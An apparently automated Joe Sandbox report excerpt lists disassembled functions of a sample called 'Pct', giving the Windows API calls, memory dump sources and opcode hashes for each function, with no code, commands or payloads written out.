                                                                                                                                                    • Part of subcall function 00C1AA52: GetCurrentThreadId.KERNEL32(00000000), ref: 00C1AA89
                                                                                                                                                    • Part of subcall function 00C1AA52: AttachThreadInput.USER32(00000000), ref: 00C1AA90
                                                                                                                                                  • GetFocus.USER32(00C50980), ref: 00C1AC2A
                                                                                                                                                    • Part of subcall function 00C1AA9B: GetParent.USER32(?), ref: 00C1AAA9
                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100,?), ref: 00C1AC73
                                                                                                                                                  • EnumChildWindows.USER32(?,00C1ACEB,?,?), ref: 00C1AC9B
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C1ACB5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                                  • String ID: %s%d
                                                                                                                                                  • API String ID: 1941087503-1110647743
                                                                                                                                                  • Opcode ID: a6df18ba12ca57202ca17b4b440a86fd9bca76b16a512ce9c5596be377802ac7
                                                                                                                                                  • Instruction ID: 11cb57c7f3bca0fa867e085b4954af8b10b6f900df737c25f674bc4ef065eaf3
                                                                                                                                                  • Opcode Fuzzy Hash: a6df18ba12ca57202ca17b4b440a86fd9bca76b16a512ce9c5596be377802ac7
                                                                                                                                                  • Instruction Fuzzy Hash: 9311DF74200204BBCF11BFA0CD85FEA77ACAF89711F1040B5FE08AA182DA715985BBB1
                                                                                                                                                  Function 00C222E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00C22318
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                                  • API String ID: 3964851224-769500911
                                                                                                                                                  • Opcode ID: 4ba1e2618e8d063fd04c00d7245df291d52d3596869833ad4680f211a7d5e536
                                                                                                                                                  • Instruction ID: 7a15081f20e5a160a66a36f14ba96a65b4a5572534ed7bc4e92f3bb09f273985
                                                                                                                                                  • Opcode Fuzzy Hash: 4ba1e2618e8d063fd04c00d7245df291d52d3596869833ad4680f211a7d5e536
                                                                                                                                                  • Instruction Fuzzy Hash: C9118E70910128AFCF00EFA4D9509FEB7F8FF15314B5084A9E824A7262EB325E06CF40
                                                                                                                                                  Function 00C3F23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C3F2F0
                                                                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C3F320
                                                                                                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00C3F453
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00C3F4D4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2364364464-0
                                                                                                                                                  • Opcode ID: b9769b64492ebe10b60de602cc613d7406b1d3ac0e774a477610eb072198632b
                                                                                                                                                  • Instruction ID: 620869f69a2d3cf9cc989c40a9f5ce3af3a0a218662f962c5da8512607899f0a
                                                                                                                                                  • Opcode Fuzzy Hash: b9769b64492ebe10b60de602cc613d7406b1d3ac0e774a477610eb072198632b
                                                                                                                                                  • Instruction Fuzzy Hash: E8818E716107009FD720EF28D892F2BB7F5AF48710F14896DF99ADB292D7B0AD418B91
                                                                                                                                                  Function 00C40697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD1A36: _memmove.LIBCMT ref: 00BD1A77
                                                                                                                                                    • Part of subcall function 00C4147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C4040D,?,?), ref: 00C41491
                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C4075D
                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C4079C
                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C407E3
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00C4080F
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C4081C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3440857362-0
                                                                                                                                                  • Opcode ID: d626ecc9f31ed121d50aef1e79cb1659fe068146230932bbda2e0f3f2372c6a1
                                                                                                                                                  • Instruction ID: 56b56cc686e656197ca9525a2f6c559496e433cadd956ae856fb837cfb641cbd
                                                                                                                                                  • Opcode Fuzzy Hash: d626ecc9f31ed121d50aef1e79cb1659fe068146230932bbda2e0f3f2372c6a1
                                                                                                                                                  • Instruction Fuzzy Hash: 3D515A31208204AFC704EF68C891F6EB7E9FF84314F14896DF59687292EB31E944DB52
                                                                                                                                                  Function 00C36E32 Relevance: 7.6, APIs: 5, Instructions: 141COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00C38475: #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C384A0
                                                                                                                                                  • #23.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C36E89
                                                                                                                                                  • #111.WSOCK32(00000000), ref: 00C36EB2
                                                                                                                                                  • #2.WSOCK32(00000000,?,00000010), ref: 00C36EEB
                                                                                                                                                  • #111.WSOCK32(00000000), ref: 00C36EF8
                                                                                                                                                  • #3.WSOCK32(00000000,00000000), ref: 00C36F0C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: #111
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 568940515-0
                                                                                                                                                  • Opcode ID: ee19d8fd65131d1b56a31251b4b5455d748dbd61be1e3d32ad32f525c6e9d828
                                                                                                                                                  • Instruction ID: 2e6404d80740a9025e35204624132e52de6385aee0d70aa0560ff877f03aeb5d
                                                                                                                                                  • Opcode Fuzzy Hash: ee19d8fd65131d1b56a31251b4b5455d748dbd61be1e3d32ad32f525c6e9d828
                                                                                                                                                  • Instruction Fuzzy Hash: DA41D475600600AFDB10BF64DC96F6EB7F89B08710F04859CF95AAB3C2DB709E008BA1
                                                                                                                                                  Function 00C2EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?,00000000), ref: 00C2EC62
                                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C2EC8B
                                                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C2ECCA
                                                                                                                                                    • Part of subcall function 00BC4D37: __itow.LIBCMT ref: 00BC4D62
                                                                                                                                                    • Part of subcall function 00BC4D37: __swprintf.LIBCMT ref: 00BC4DAC
                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C2ECEF
                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C2ECF7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1389676194-0
                                                                                                                                                  • Opcode ID: ea451cdb00eedac032bbc0f891dc338242901aec126b549e8d629b3023a04f4f
                                                                                                                                                  • Instruction ID: 0b4a757ec876e9f15515af774d73ece2ee22413386c53644175b0c7e116c4b24
                                                                                                                                                  • Opcode Fuzzy Hash: ea451cdb00eedac032bbc0f891dc338242901aec126b549e8d629b3023a04f4f
                                                                                                                                                  • Instruction Fuzzy Hash: FB514D35A00615DFCB01EF64C995EAEBBF5EF08310F1484A9E809AB362CB31EE51DB50
                                                                                                                                                  Function 00C4A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 363c7e73d92a553f687ffe28061e220a056d1e1bcf24f5c4f27b0f3f9f988736
                                                                                                                                                  • Instruction ID: a9b579fac6841d94387460e5591c648e4b7cafb17a0a6406c4a5ebe89fab7660
                                                                                                                                                  • Opcode Fuzzy Hash: 363c7e73d92a553f687ffe28061e220a056d1e1bcf24f5c4f27b0f3f9f988736
                                                                                                                                                  • Instruction Fuzzy Hash: 9241D279944214AFD720DB28CC88FA9BBB8FB09310F154265FD26F72D2D770AE41DA51
                                                                                                                                                  Function 00BC2714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetCursorPos.USER32(?,?,00C877B0,?,00C877B0,00C877B0,?,00C4C5FF,00000000,00000001,?,?,?,00BFBD40,?,?), ref: 00BC2727
                                                                                                                                                  • ScreenToClient.USER32(00C877B0,?,?,00C4C5FF,00000000,00000001,?,?,?,00BFBD40,?,?,?,?,?,00000001), ref: 00BC2744
                                                                                                                                                  • GetAsyncKeyState.USER32(00000001,?,00C4C5FF,00000000,00000001,?,?,?,00BFBD40,?,?,?,?,?,00000001,?), ref: 00BC2769
                                                                                                                                                  • GetAsyncKeyState.USER32(00000002,?,00C4C5FF,00000000,00000001,?,?,?,00BFBD40,?,?,?,?,?,00000001,?), ref: 00BC2777
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4210589936-0
                                                                                                                                                  • Opcode ID: 521348a00ea0e7fce71d9998028f502afb563a36c7d59e9599da7ee00c14b945
                                                                                                                                                  • Instruction ID: 0c4285cf39f7c6c24780d3b7fb681e266677c6933191b5572d8255d3eef98c8e
                                                                                                                                                  • Opcode Fuzzy Hash: 521348a00ea0e7fce71d9998028f502afb563a36c7d59e9599da7ee00c14b945
                                                                                                                                                  • Instruction Fuzzy Hash: 72416F7560411DFBDF159F68C984FE9BBB4FB05364F20839AF824A6290CB30AD94DB91
                                                                                                                                                  Function 00C195D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00C195E8
                                                                                                                                                  • PostMessageW.USER32(?,00000201,00000001,?,?,?), ref: 00C19692
                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C1969A
                                                                                                                                                  • PostMessageW.USER32(?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C196A8
                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C196B0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3382505437-0
                                                                                                                                                  • Opcode ID: f3ee9ce84f22df14febf2ca562f7538c86f6776d855d07db234a54ea8e9f6e38
                                                                                                                                                  • Instruction ID: 44606464f649e87d03264df2d6d94d0500abee91b02310bce5554299a6553cf9
                                                                                                                                                  • Opcode Fuzzy Hash: f3ee9ce84f22df14febf2ca562f7538c86f6776d855d07db234a54ea8e9f6e38
                                                                                                                                                  • Instruction Fuzzy Hash: ED31BF71500219EFDB14CF68D94CBDE3BB5FB45316F104219F924E61D0C7B09AA4EBA1
                                                                                                                                                  Function 00C1BD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • IsWindowVisible.USER32(?,?,?,?,?), ref: 00C1BD9D
                                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000,?,?,?,?), ref: 00C1BDBA
                                                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000,?,?,?,?), ref: 00C1BDF2
                                                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C1BE18
                                                                                                                                                  • _wcsstr.LIBCMT ref: 00C1BE22
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3902887630-0
                                                                                                                                                  • Opcode ID: f89fde643222e94ec8ebe6529984bd70c4c27dcea719b95e14c99862ebaf692e
                                                                                                                                                  • Instruction ID: b9a92d2460f66c7d8311af5d8db71d26c3759c1016d7f14ea06dc196ecf9beb4
                                                                                                                                                  • Opcode Fuzzy Hash: f89fde643222e94ec8ebe6529984bd70c4c27dcea719b95e14c99862ebaf692e
                                                                                                                                                  • Instruction Fuzzy Hash: 2821DA322042447AEB255B369C49FBF7BDCDF46760F104069FD09DA191DF61DD90A660
                                                                                                                                                  Function 00C4B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,00BC1CE4,?), ref: 00BC29F3
                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0,?,?,?,?,00C3155C,00000000,?,00000000), ref: 00C4B804
                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001,?,?,?,?,00C3155C,00000000,?,00000000), ref: 00C4B829
                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF,?,?,?,?,00C3155C,00000000,?,00000000), ref: 00C4B841
                                                                                                                                                  • GetSystemMetrics.USER32(00000004,?,?,?,?,?,?,?,00C3155C,00000000,?,00000000), ref: 00C4B86A
                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C3155C,00000000), ref: 00C4B888
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Long$MetricsSystem
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2294984445-0
                                                                                                                                                  • Opcode ID: 3115ab5d856336c3e257fea7c326079564e38a24c4713a4e5506203b919e7a7a
                                                                                                                                                  • Instruction ID: 600136c36cecfd50d3350b8dfde92c57dbd10e3e3cbf414bcb8fbc04f7ad17c4
                                                                                                                                                  • Opcode Fuzzy Hash: 3115ab5d856336c3e257fea7c326079564e38a24c4713a4e5506203b919e7a7a
                                                                                                                                                  • Instruction Fuzzy Hash: 0B217F71914215AFCB149F398C08B6A7BA8FB45725F204B39F935E61E1E730DD50CB90
                                                                                                                                                  Function 00C36138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • IsWindow.USER32(00000000), ref: 00C36159
                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00C36170
                                                                                                                                                  • GetDC.USER32(00000000), ref: 00C361AC
                                                                                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00C361B8
                                                                                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00C361F3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4156661090-0
                                                                                                                                                  • Opcode ID: a3667d76e059fc65355d3d0f73de998dc74f3f7e4e3437238d30b6314ba345dd
                                                                                                                                                  • Instruction ID: 15163b0962921cd535e33ab6cf1cdd9b22726c91ce29ffc2d954ae22f698d02f
                                                                                                                                                  • Opcode Fuzzy Hash: a3667d76e059fc65355d3d0f73de998dc74f3f7e4e3437238d30b6314ba345dd
                                                                                                                                                  • Instruction Fuzzy Hash: AD21A175A00204AFD714EF65DC84B9EBBF9EF88311F148469F84AD7252CB30AD40DB90
                                                                                                                                                  Function 00BC16CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BC1729
                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00BC1738
                                                                                                                                                  • BeginPath.GDI32(?), ref: 00BC174F
                                                                                                                                                  • SelectObject.GDI32(?,00000000,000000FF,00000000), ref: 00BC1778
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3225163088-0
                                                                                                                                                  • Opcode ID: 1234c0644a329af57cb2cb0286bea544133c5e77ead1664c847f6fc086b6008f
                                                                                                                                                  • Instruction ID: 54b027617736d5aa6fca73e0c464dff3df14c26ab806b026cea869ce6129fb47
                                                                                                                                                  • Opcode Fuzzy Hash: 1234c0644a329af57cb2cb0286bea544133c5e77ead1664c847f6fc086b6008f
